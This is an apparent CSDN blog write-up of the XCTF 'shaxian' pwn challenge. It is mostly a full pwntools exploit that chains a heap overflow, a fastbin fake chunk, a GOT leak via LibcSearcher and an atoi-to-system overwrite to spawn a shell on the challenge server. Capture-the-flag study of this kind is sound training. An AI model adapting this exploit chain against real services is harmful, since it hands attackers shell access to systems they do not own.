攻防世界PWN之shaxian题解

最新推荐文章于 2023-07-15 20:11:40 发布
最新推荐文章于 2023-07-15 20:11:40 发布
阅读量620 收藏
点赞数 1
分类专栏: pwn CTF 二进制漏洞 文章标签: PWN CTF 二进制漏洞 缓冲区溢出 逆向工程
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/104241759
版权
pwn 同时被 3 个专栏收录
161 篇文章 24 订阅
订阅专栏
CTF
161 篇文章 9 订阅
订阅专栏
二进制漏洞
161 篇文章 9 订阅
订阅专栏

shaxian

首先,检查一下程序的保护机制

然后,我们用IDA分析一下

功能1存在溢出

free后没有清空指针

我们先创建链表三个节点,程序使用的是头插法,因此,当我们释放的时候,第一个节点最后释放,而当我们再申请同样大小的块时,由于fastbin的特性,第一个块就先被申请回来了,这样,我们溢出到节点2的结构体,覆盖指针为函数got表,就能泄露信息

  1. #头插法建立链表,chunk0最后被释放  
  2. add('10','a'#0  
  3. add('10','b'#1  
  4. add('10','c'#2  
  5. #释放链表,但不清空指针  
  6. delete()  
  7. #chunk0申请回来,并且在chunk0代表的结构体链表链接上putsgot表地址,这样我们再次show的时候就可以泄露信息  
  8. payload = 'a'*0x20 + p32(puts_got-0x4)  
  9. #prev_size size fd  
  10. payload += p32(0) + p32(0x31) + p32(ptr-0x10) #chunk1  
  11. add('10',payload)  

然后,我们show,就能泄露信息了

  1. show()  
  2. sh.recvuntil('* 10\n')  
  3. puts_addr = u32(sh.recv(4))  
  4. #print 'puts_addr=',hex(puts_addr)  
  5. libc = LibcSearcher('puts',puts_addr)  
  6. libc_base = puts_addr - libc.dump('puts')  
  7. system_addr = libc_base + libc.dump('system')  
  8. print 'libc_base=',hex(libc_base)  
  9. print 'system_addr=',hex(system_addr)  

接下来,我们想办法修改atoi的got表内容为system地址,由于fastbin特性,我们不能直接申请到atoi的got表处,因此,我们得想其他办法。只要我们控制了dword_804B1C0这个链表头指针,我们就能对指定位置进行读写,因此,我们只要申请到这个指针附近,就可以控制它。

因此,看到之前,我们在覆盖节点1(chunk0)的next指针时,顺便chunk1fd指针指向了ptr-0x10,因为我们准备在这附近伪造一个大小一样的chunk结构,就可以申请到这里。

而这个fake_chunk,我们得事先伪好,因此在程序一开始的时候

  1. fake_chunk = p32(0) + p32(0x31)    
  2. #为了能够控制堆指针ptr,我们在ptr上面可控靠近区伪造一个0x31的假chunk链接到fastbin,然后申请到这里即可    
  3. payload = 'd'*(0x100-0x10) + fake_chunk    
  4. sh.sendlineafter('Your Phone number:',payload)    

当我们申请到fake_chunk处时,就可以顺便修改atoi的got表了,我们再重新来看看程序的插入逻辑

  1. int sub_80488AF()  
  2. {  
  3.   _DWORD *v0; // ebx  
  4.   int v2; // [esp+1Ch] [ebp-Ch]  
  5.   
  6.   v2 = dword_804B1C0;  
  7.   puts("CHI SHEN ME?");  
  8.   puts("1.Banmian");  
  9.   puts("2.Bianrou");  
  10.   puts("3.Qingtangmian");  
  11.   puts("4.Jianbao");  
  12.   puts("5.Jianjiao");  
  13.   dword_804B1C0 = (int)malloc(0x28u);  
  14.   if ( !dword_804B1C0 )  
  15.     return puts("Error");  
  16.   *(_DWORD *)(dword_804B1C0 + 36) = v2;  
  17.   sub_804865D(0, dword_804B1C0 + 4, 0x3C, 10);  
  18.   //程序执行到这时,dword_804B1C0已经变成了atoi_got  
  19.   puts("How many?");  
  20.   v0 = (_DWORD *)dword_804B1C0;  
  21.   //这句代码。正好把*(atoi_got)处给修改了  
  22.   *v0 = sub_80486CD();  
  23.   puts("Add to GOUWUCHE");  
  24.   return dword_804B2E0++ + 1;  
  25. }  

综上,我们完整的exp

#coding:utf8
from pwn import *
from LibcSearcher import *

#sh = process('./shaxian')
sh = remote('111.198.29.45',55897)
elf = ELF('./shaxian')
puts_got = elf.got['puts']
atoi_got = elf.got['atoi']
ptr = 0x804B1C0

def add(count,content):
   sh.sendlineafter('choose:','1')
   sh.sendlineafter('5.Jianjiao',content)
   sh.sendlineafter('How many?',count)

def delete():
   sh.sendlineafter('choose:','2')

def show():
   sh.sendlineafter('choose:','4')

sh.sendlineafter('Your Address:','seaase')
fake_chunk = p32(0) + p32(0x31)
#为了能够控制堆指针ptr,我们在ptr上面可控靠近区伪造一个0x31的假chunk链接到fastbin,然后申请到这里即可
payload = 'd'*(0x100-0x10) + fake_chunk
sh.sendlineafter('Your Phone number:',payload)

#头插法建立链表,chunk0最后被释放
add('10','a') #0
add('10','b') #1
add('10','c') #2
#释放链表,但不清空指针
delete()
#把chunk0申请回来,并且在chunk0代表的结构体链表链接上puts的got表地址,这样我们再次show的时候就可以泄露信息
payload = 'a'*0x20 + p32(puts_got-0x4)
#prev_size size fd
payload += p32(0) + p32(0x31) + p32(ptr-0x10) #chunk1
add('10',payload)
show()
sh.recvuntil('* 10\n')
puts_addr = u32(sh.recv(4))
#print 'puts_addr=',hex(puts_addr)
libc = LibcSearcher('puts',puts_addr)
libc_base = puts_addr - libc.dump('puts')
system_addr = libc_base + libc.dump('system')
print 'libc_base=',hex(libc_base)
print 'system_addr=',hex(system_addr)
add('10','b') #chunk1
#申请堆块到ptr上方的假chunk处,将ptr指针覆盖为atoi的got地址,同时修改atoi的got表
add(str(system_addr - 0x100000000),'dddd' + p32(atoi_got))
#getshell
sh.sendline('/bin/sh')

sh.interactive()

 

ha1vk
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【广东大学生网络攻防大赛】Pwn | jmp_rsp 题目附件
05-24
【广东大学生网络攻防大赛】Pwn | jmp_rsp 题目附件
level0 -- 攻防世界新手题
01-19
来自攻防世界pwn题,是一道简单的新手样本题目,但由于不同linux的libc版本,会使得在ubuntu18.04以及ubuntu20.04中进行漏洞利用产生一些小问题。漏洞利用问题解决链接:https://blog.csdn.net/A951860555/article/details/112849849
攻防世界--shrine-(详细操作)做题笔记
qq_43715020的博客
06-14 882
攻防世界--shrine-笔(详细操作)做题笔记
攻防世界 pwn 进阶 shaxian
yongbaoii的博客
02-22 226
保护 先留下了地址跟电话。 点餐函数。 结构大概是这样的 然后点餐那里可以溢出 submit 他这很有意思他这个程序记录你不停点餐的方式是在那个空间最后八个字节放进去了bss上地址本来有的东西,然后free之后再给它放回去,就是套娃的样子。但是我们能够溢出啊,我们之间可以控制它最后放在我们那个地方的地址,这不就好起来了嘛? receipt review view循环着把东西都输出出来。 ...
攻防世界-PWN-shaxian-堆溢出与FastbinAttack
aptx4869_li的博客
07-15 311
攻防世界shaxian题目的解题思路
PWN工具介绍
kelxLZ的博客
07-02 1008
Author:ZERO-A-ONE Date:2021-07-02 一、PWNTOOLS 1.1 程序的启动与远程连接 使用process接口启动程序 常用:process(argv,env),例如: process('./demo'):执行可执行文件demo process(['cat','flag]):执行命令cat flag process("./demo",env={'LD_PRELOAD':'./libc.so.6'}):以指定环境变量运行文件 当程序运行于远程时,提供了Host和监.
Pwn入门笔记(一)基础编程函数
qq_33590156的博客
11-23 1829
基础编程函数文件库和设置本地文件的调试和远程端口的连接发送和接收文件的加载类函数打/解包函数打包:解包shellcode 正式开始学习pwn了,第一次写pwn脚本,在开始之前需要了解一些基础知识。写pwn脚本我们用python在linux环境下运行。 文件库和设置 安装pwntools库后,开头加上 from pwn import * 这是导入pwntools库的所有函数,也是一个pwn脚本的起点。 context(os="liunx",arch="x86/amd64",log_level="debug"
pwntools常用脚本语句介绍讲解
半岛铁盒的博客
02-23 2704
接收远端传回的数据 interactive() : 在取得shell之后使用,直接进行交互,相当于回到shell的模式。 recv(numb=字节大小, timeout=default) : 接收指定字节数。 recvall() : 一直接收直到达到文件EOF。 recvline(keepends=True) : 接收一行,keepends为是否保留行尾的\n。 recvuntil(delims, drop=False) : 一直读到delims的pattern出现为止。 recvrepeat(timeou
攻防世界pwn题:Recho.doc
07-13
攻防世界pwn题:Recho.doc
攻防世界pwn题:forgot.doc
07-13
攻防世界pwn题:forgot.doc
Pwn】fuzzerinstrospector(首届数字空间安全攻防大赛)
07-16
首届数字空间安全攻防大赛
攻防世界supermarket
qq_44370676的博客
08-25 352
首先检查保护机制 然后运行一下 是一个菜单题,接着往下看 可以看到,选项3会按行打印出每个商品的信息,在des.后面就是商品的description 接着IDA分析 首先看看sub_8048864() sub_8048812就是读入一串字符串到nptr,这一块并没有溢出点,但是这里并不是以%d的方式输入数字,而是先输入字符串然后用atoi函数转换,如果能够修改atoi的got表为system并且输入/bin/sh那么我们的目的便达成了。接着往下看,看能不能实现这.
攻防世界PWN之dubblesort题解
seaaseesa的博客
11-18 1096
dubblesort 首先看一下程序的保护机制 保护全开,并且是一个32位程序 然后,我们用IDA分析一下 这里,有两个漏洞 第一个是在调用read之前,没有调用memset对buf清空,因此,buf里可能之前会有一些残留的关键数据 第二个是,输入的整数个数没有上限,可以造成数据溢出,其实也就是栈溢出。 我们在read断点,然后观察栈中的数据,发现数据还未输入时,栈里就...
uaf-逻辑题-攻防世界 supermarket
csdn546229768的博客
11-30 365
刚开始我也被这题绕晕了,做这种题要画图画图!!!不然很容易做着做着忘了自己做到哪里来了 本题环境是ubuntu16、glib2.23!!!我第一次做的时候用的ubuntu18也就是glib2.27这时有tcache freechunk的分配策略不一样死活跑不出来,这题我还要研究一下tcache版本的。 首先申请了一个不在fastbin范围(0x10~0x58)的chunk0,然后再申请一个随便大小的chunk1,解释:因为下面我将要用remalloc重新分配chun0,remalloc如果重新分配的ch
攻防世界PWN之Supermarket题解
seaaseesa的博客
11-15 2225
Supermarket 首先,看一下程序的保护机制。看起来还不错 然后,我们用IDA分析一下 分析出程序大概有这样的一个结构体 typedefstructNode{ charname[16]; intprice; intdescription_size; char*description; }Node;...
快速入门堆溢出技巧(OFF BY ONE)
蚁景网安学院
05-10 572
OFF BY ONE所谓OFF BY ONE就是利用堆溢出一个字节到下一个堆块,使得目前堆块与下一堆块合并成一个堆块,此时堆块的大小就是我们溢出的那一字节并且堆块的fd(前驱指针)以及bk...
pwntools语句的简单使用,包含例子
半岛铁盒的博客
12-17 2608
from pwn import * #io = process("./int_overflow") io = remote("远程链接ip",端口) flag_addr = 需要覆盖的flag地址如0x804868B offset = 0x14 + 0x4 io.sendlineafter("Your choice:","1") io.sendlineafter("username:","aaa") payload = b"A"*offset + p32(flag_addr) + b"A"*(260 - o
见微知著(一):解析ctf中的pwn--Fast bin里的UAF
weixin_30826761的博客
12-14 309
  在网上关于ctf pwn的入门资料和writeup还是不少的,但是一些过渡的相关知识就比较少了,大部分赛棍都是在不断刷题中总结和进阶的。所以我觉得可以把学习过程中的遇到的一些问题和技巧总结成文,供大家参考和一起交流。当然,也不想搞那些烂大街的东西,所以,打算从一道道pwn题开始,见微知著,在题目中延伸。 一:工欲善其事必先利其器   ubuntu14.01 64位(该版本对pwnto...
CTF-PWN-callme32 [ROP+栈溢出]
SuperGate的博客
08-13 868
首先发现在pwnme函数中有一个明显的缓冲区溢出,长度为40,经调试发现填入44长度的垃圾信息即可填入shellcode ida发现一个重要函数如下: 点入后发现这三个函数为系统级调用。正好题目给了我们一个.so文件。进入查看,发现有这三个函数的反编译。依次是将加密后的flag通过key1,key2解密。调用顺序应该是callme_one -> callme_two -> c...
攻防世界 pwn repeater
最新发布
09-13
攻防世界是一个CTF竞赛平台,其中包含了各种类型的题目,包括pwn和repeater题目。根据引用中提到的信息,攻防世界标记的难度可能不准确。这可能是因为题目的实际难度与标记的难度不一致,导致出现了这种情况。 至于repeater题目,根据引用中提供的代码,该题目涉及到了远程攻击和内存溢出的技术。代码中使用了pwn工具包来进行远程连接和漏洞利用。通过发送一段恶意输入,攻击者可以覆盖程序的返回地址,使得程序执行恶意的shellcode。 具体地说,代码中通过发送一系列的输入,包括恶意shellcode,使得程序发生内存溢出,覆盖了主函数的返回地址,从而让主函数正常退出,并跳转到shellcode的首条指令处。 在此过程中,使用了pwn工具包中的一些功能,如远程连接、编码shellcode等。代码中也展示了一些具体的操作步骤,如发送输入、计算地址等。 综上所述,攻防世界中的pwn和repeater题目分别涉及到了漏洞利用和内存溢出的技术。通过精心构造的输入,攻击者可以利用程序的漏洞来执行恶意代码。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值